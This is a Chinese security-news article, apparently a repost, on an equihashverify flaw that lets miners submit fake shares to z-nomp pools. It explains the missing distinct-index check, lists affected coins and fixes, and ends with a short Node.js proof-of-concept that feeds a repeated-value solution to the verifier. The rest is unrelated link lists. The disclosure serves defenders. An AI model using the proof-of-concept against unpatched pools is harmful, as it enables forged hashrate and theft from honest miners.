会员服务

黑客伪造算力盗取多种数字货币

2018 年 5 月 5 日 黑白之道


我只想说,世界是黑客的!


最近,360检测了一种新型攻击,黑客可以利用漏洞伪造算力,进而从矿池中窃取数字货币。


经过分析,我们发现此类攻击利用了一个equihash算法(equihashverify: https://github.com/joshuayabut/equihashverify)实现上的逻辑漏洞。该漏洞可导致恶意矿工向z-nomp矿池提交虚假share,从而伪造自己的算力。从矿池中窃取诚实矿工的挖矿成果。由于目前许多新生数字货币均使用equihash算法进行工作量证明,且多数equihash矿池依赖于该equihashverify进行矿工算力校验,所以该漏洞严重已经影响多个数字货币矿池。


Equihash 是一种工作量证明算法,由 Alex Biryukov 以及Dmitry Khovratovich设计而成,以一种计算机科学以及加密学概念(叫做广义生日悖论)为基础。 Equihash是一种需要高内存的工作量证明,这意味你能挖到多少币主要取决于你的设备内存的大小。在短期内要创建一个低成本的挖矿定制硬件(专用集成电路)几乎不可能,所以Equihash被认为可以构造更去中心化的一种POW算法。z-nomp在对Equihash工作量证明进行验证的时候使用了equihashverify依赖库来对矿工提交算力证明份额进行校验。equihashverify对Equihash解验证的错误实现,导致了该漏洞。


下面我们来看看漏洞:


在equi.c文件中,在函数bool verifyEH(const char *hdr, const char *soln)中,hdr是区块头信息,参数soln是矿工求解出来的{Xij}序列。verifyEH函数的作用,就是用来判断{Xij}是否是由区块头信息hdr产生的广义生日悖论问题的正确解。



Equihash算法的整体实现可以理解为将Xij序列带入到


Vhash=hash(hdr,x1)^ hash(hdr,x2) ^…^. hash(hdr,x512);


然后判断Vhash的结果是否全部为0。如果全部为0,则返回true;如果全部不为0,则返回false。这看似正确的实现,但实际上编程人员没有考虑到:在广义生日悖论问题中,所有的xij必须是不相同的。而这里并没有检查是否由重复。对于任意区块头hdr,攻击者只要让所有的 xi全部相等,则得到结果:


hash(hdr,x1)=hash(hdr,x2) =…= hash(hdr,x512)


由于这里刚好有偶数个,那么可以得到:


Vhash=hash(hdr,x1)^ hash(hdr,x2) ^…^. hash(hdr,x512)=0


也就是说,对于任意hdr,攻击者随机选择一个21bit的数x,让后让soln={x,x,x,…,x},就可以绕过广义生日悖论问题验证,从而实现高达数十万倍的算力数虚构。由于equihashverify实现中缺乏equihash论文中的多种其他校验算法,所以除了这个简单的碰撞攻击之外,该代码还存在其他安全问题。密码算法的实现应严格按照算法标准来进行,否则就容易出现安全漏洞。Equihash算法标准详细细节可参考论文:https://www.cryptolux.org/images/b/b9/Equihash.pdf

 

漏洞影响范围


z-nomp是目前是目前市场占有率最高的equihash矿池。此次伪造算力攻击主要针对各个z-nomp或基于z-nomp的矿池实例,至少影响了包括Zcash、Bitcoin Gold、Zencash、Bitcoin Private、Zclassic、Komodo、Hush、BitcoinZ、Bitcoin Candy、NewBTG等多种数字货币。

 

当前修复情况


目前,z-nomp已经将了equihashverify库的的依赖换成了官方认证的版本(https://github.com/zencashofficial/equihashverify.git)。zencash官方已在上周发布更新公告:https://blog.zencash.com/update-for-the-equihash-mining-application-z-nomp/。 Bitcoin Gold官方也更新了新的equihashjs-verify。Zclassic/BTG/Zcash等主流数字货币和主流矿场均已修复了该实现漏洞。但由于数字货币分叉币和代码fork非常多,所以仍存在众多小数字货币和小矿池未修复该漏洞,360建议各数字货币社区和矿池及时更新。

 

解决方案


可使用目前zencash官方的equihash解校验器的来进行广义生日问题解校验。https://github.com/zencashofficial/equihashverify


这里提供一个简单的POC:


var ev = require(‘bindings’)(‘equihashverify.node’);

header = Buffer(‘0400000008e9694cc2120ec1b5733cc12687b609058eec4f7046a521ad1d1e3049b400003e7420ed6f40659de0305ef9b7ec037f4380ed9848bc1c015691c90aa16ff3930000000000000000000000000000000000000000000000000000000000000000c9310d5874e0001f000000000000000000000000000000010b000000000000000000000000000040’, ‘hex’);

soln = Buffer(‘0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c00
03e0001f0000f80007c0003e0001f0000f80007c0003e0001f0000f80007c0003e0001f’, ‘hex’);

console.log(ev.verify(header, soln));


文章出处:安全客

原文链接:https://www.anquanke.com/post/id/106025?from=timeline

你可能喜欢

注意了!数字货币钱包“Ledger”传出漏洞,黑客可篡改钱包地址

登录查看更多
0

相关内容

【ICML2020】深度神经网络置信感知学习,Confidence-Aware Learning for Deep Neural Networks
【ICML2020】深度神经网络置信感知学习,Confidence-Aware Learning for Deep Neural Networks
专知会员服务
72+阅读 · 2020年7月6日
【ICML2020-南大周志华老师组】针对未见类未标记数据的安全深度半监督学习
【ICML2020-南大周志华老师组】针对未见类未标记数据的安全深度半监督学习
专知会员服务
40+阅读 · 2020年7月5日
【CVPR2020】跨模态哈希的无监督知识蒸馏
【CVPR2020】跨模态哈希的无监督知识蒸馏
专知会员服务
60+阅读 · 2020年6月25日
AI创新者:破解项目绩效的密码
AI创新者:破解项目绩效的密码
专知会员服务
33+阅读 · 2020年6月21日
【ACL2020】DeeBERT:动态加速BERT推理,DeeBERT: Dynamic Early Exiting for Accelerating BERT Inference
【ACL2020】DeeBERT:动态加速BERT推理,DeeBERT: Dynamic Early Exiting for Accelerating BERT Inference
专知会员服务
20+阅读 · 2020年4月30日
解决非线性逆问题的新型深度神经网络,30页ppt,University of Helsinki
解决非线性逆问题的新型深度神经网络,30页ppt,University of Helsinki
专知会员服务
22+阅读 · 2020年4月29日
【资源】100+本免费数据科学书
【资源】100+本免费数据科学书
专知会员服务
107+阅读 · 2020年3月17日
新时期我国信息技术产业的发展
新时期我国信息技术产业的发展
专知会员服务
70+阅读 · 2020年1月18日
【清华大学】Bert 简介,Bidirectional Encoder Representations from Transformers,21页ppt
【清华大学】Bert 简介,Bidirectional Encoder Representations from Transformers,21页ppt
专知会员服务
78+阅读 · 2019年12月29日
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
专知会员服务
29+阅读 · 2019年10月17日
基于知识蒸馏的BERT模型压缩
基于知识蒸馏的BERT模型压缩
大数据文摘
18+阅读 · 2019年10月14日
PC微信逆向:两种姿势教你解密数据库文件
PC微信逆向:两种姿势教你解密数据库文件
黑客技术与网络安全
16+阅读 · 2019年8月30日
【数字孪生】数字孪生技术发展趋势与安全风险浅析
【数字孪生】数字孪生技术发展趋势与安全风险浅析
产业智能官
54+阅读 · 2019年8月28日
已删除
已删除
AI掘金志
7+阅读 · 2019年7月8日
无人驾驶仿真软件
无人驾驶仿真软件
智能交通技术
21+阅读 · 2019年5月9日
【数字孪生】一文读懂数字孪生的应用及意义
【数字孪生】一文读懂数字孪生的应用及意义
产业智能官
43+阅读 · 2018年9月28日
【区块链】区块链是什么?20问:读懂区块链
【区块链】区块链是什么?20问:读懂区块链
产业智能官
8+阅读 · 2018年1月10日
tensorflow LSTM + CTC实现端到端OCR
tensorflow LSTM + CTC实现端到端OCR
机器学习研究会
26+阅读 · 2017年11月16日
【动画连载】3分钟了解什么是区块链(中文动画)
【动画连载】3分钟了解什么是区块链(中文动画)
FinTech前哨
7+阅读 · 2017年11月15日
威胁情报浅析
威胁情报浅析
计算机与网络安全
7+阅读 · 2017年11月15日
A survey on Semi-, Self- and Unsupervised Techniques in Image Classification
A survey on Semi-, Self- and Unsupervised Techniques in Image Classification
Arxiv
100+阅读 · 2020年2月20日
Knowledge Distillation from Internal Representations
Knowledge Distillation from Internal Representations
Arxiv
4+阅读 · 2019年10月8日
Revisiting CycleGAN for semi-supervised segmentation
Revisiting CycleGAN for semi-supervised segmentation
Arxiv
3+阅读 · 2019年8月30日
Pixel Level Data Augmentation for Semantic Image Segmentation using Generative Adversarial Networks
Pixel Level Data Augmentation for Semantic Image Segmentation using Generative Adversarial Networks
Arxiv
5+阅读 · 2019年2月8日
UPSNet: A Unified Panoptic Segmentation Network
UPSNet: A Unified Panoptic Segmentation Network
Arxiv
4+阅读 · 2019年1月12日
Data Augmentation of Room Classifiers using Generative Adversarial Networks
Data Augmentation of Room Classifiers using Generative Adversarial Networks
Arxiv
4+阅读 · 2019年1月10日
Near Real-time Hippocampus Segmentation Using Patch-based Canonical Neural Network
Near Real-time Hippocampus Segmentation Using Patch-based Canonical Neural Network
Arxiv
4+阅读 · 2018年7月15日
Aspect Based Sentiment Analysis with Gated Convolutional Networks
Arxiv
12+阅读 · 2018年5月18日
Image Segmentation Using Subspace Representation and Sparse Decomposition
Arxiv
6+阅读 · 2018年4月6日
An application of cascaded 3D fully convolutional networks for medical image segmentation
Arxiv
9+阅读 · 2018年3月14日
VIP会员
相关主题
数字货币
算力
哈希学习
黑客 (Hacker)
算法
专用集成电路
相关VIP内容
【ICML2020】深度神经网络置信感知学习,Confidence-Aware Learning for Deep Neural Networks
【ICML2020】深度神经网络置信感知学习,Confidence-Aware Learning for Deep Neural Networks
专知会员服务
72+阅读 · 2020年7月6日
【ICML2020-南大周志华老师组】针对未见类未标记数据的安全深度半监督学习
【ICML2020-南大周志华老师组】针对未见类未标记数据的安全深度半监督学习
专知会员服务
40+阅读 · 2020年7月5日
【CVPR2020】跨模态哈希的无监督知识蒸馏
【CVPR2020】跨模态哈希的无监督知识蒸馏
专知会员服务
60+阅读 · 2020年6月25日
AI创新者:破解项目绩效的密码
AI创新者:破解项目绩效的密码
专知会员服务
33+阅读 · 2020年6月21日
【ACL2020】DeeBERT:动态加速BERT推理,DeeBERT: Dynamic Early Exiting for Accelerating BERT Inference
【ACL2020】DeeBERT:动态加速BERT推理,DeeBERT: Dynamic Early Exiting for Accelerating BERT Inference
专知会员服务
20+阅读 · 2020年4月30日
解决非线性逆问题的新型深度神经网络,30页ppt,University of Helsinki
解决非线性逆问题的新型深度神经网络,30页ppt,University of Helsinki
专知会员服务
22+阅读 · 2020年4月29日
【资源】100+本免费数据科学书
【资源】100+本免费数据科学书
专知会员服务
107+阅读 · 2020年3月17日
新时期我国信息技术产业的发展
新时期我国信息技术产业的发展
专知会员服务
70+阅读 · 2020年1月18日
【清华大学】Bert 简介,Bidirectional Encoder Representations from Transformers,21页ppt
【清华大学】Bert 简介,Bidirectional Encoder Representations from Transformers,21页ppt
专知会员服务
78+阅读 · 2019年12月29日
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
专知会员服务
29+阅读 · 2019年10月17日
热门VIP内容
相关资讯
基于知识蒸馏的BERT模型压缩
基于知识蒸馏的BERT模型压缩
大数据文摘
18+阅读 · 2019年10月14日
PC微信逆向:两种姿势教你解密数据库文件
PC微信逆向:两种姿势教你解密数据库文件
黑客技术与网络安全
16+阅读 · 2019年8月30日
【数字孪生】数字孪生技术发展趋势与安全风险浅析
【数字孪生】数字孪生技术发展趋势与安全风险浅析
产业智能官
54+阅读 · 2019年8月28日
已删除
已删除
AI掘金志
7+阅读 · 2019年7月8日
无人驾驶仿真软件
无人驾驶仿真软件
智能交通技术
21+阅读 · 2019年5月9日
【数字孪生】一文读懂数字孪生的应用及意义
【数字孪生】一文读懂数字孪生的应用及意义
产业智能官
43+阅读 · 2018年9月28日
【区块链】区块链是什么?20问:读懂区块链
【区块链】区块链是什么?20问:读懂区块链
产业智能官
8+阅读 · 2018年1月10日
tensorflow LSTM + CTC实现端到端OCR
tensorflow LSTM + CTC实现端到端OCR
机器学习研究会
26+阅读 · 2017年11月16日
【动画连载】3分钟了解什么是区块链(中文动画)
【动画连载】3分钟了解什么是区块链(中文动画)
FinTech前哨
7+阅读 · 2017年11月15日
威胁情报浅析
威胁情报浅析
计算机与网络安全
7+阅读 · 2017年11月15日
相关论文
A survey on Semi-, Self- and Unsupervised Techniques in Image Classification
A survey on Semi-, Self- and Unsupervised Techniques in Image Classification
Arxiv
100+阅读 · 2020年2月20日
Knowledge Distillation from Internal Representations
Knowledge Distillation from Internal Representations
Arxiv
4+阅读 · 2019年10月8日
Revisiting CycleGAN for semi-supervised segmentation
Revisiting CycleGAN for semi-supervised segmentation
Arxiv
3+阅读 · 2019年8月30日
Pixel Level Data Augmentation for Semantic Image Segmentation using Generative Adversarial Networks
Pixel Level Data Augmentation for Semantic Image Segmentation using Generative Adversarial Networks
Arxiv
5+阅读 · 2019年2月8日
UPSNet: A Unified Panoptic Segmentation Network
UPSNet: A Unified Panoptic Segmentation Network
Arxiv
4+阅读 · 2019年1月12日
Data Augmentation of Room Classifiers using Generative Adversarial Networks
Data Augmentation of Room Classifiers using Generative Adversarial Networks
Arxiv
4+阅读 · 2019年1月10日
Near Real-time Hippocampus Segmentation Using Patch-based Canonical Neural Network
Near Real-time Hippocampus Segmentation Using Patch-based Canonical Neural Network
Arxiv
4+阅读 · 2018年7月15日
Aspect Based Sentiment Analysis with Gated Convolutional Networks
Arxiv
12+阅读 · 2018年5月18日
Image Segmentation Using Subspace Representation and Sparse Decomposition
Arxiv
6+阅读 · 2018年4月6日
An application of cascaded 3D fully convolutional networks for medical image segmentation
Arxiv
9+阅读 · 2018年3月14日
大家都在搜
  1. palantir
  2. 洛克菲勒
  3. 大规模语言模型
  4. 生成式人工智能
  5. 斯坦福博士论文
  6. 自主可控
  7. 知识管理
  8. 联合试验
  9. 装备维修
  10. 社区分享 | 用 PoseNet + TensorFlow.js 在浏览器实现体感游戏
    11.
Top
微信扫码咨询专知VIP会员
Top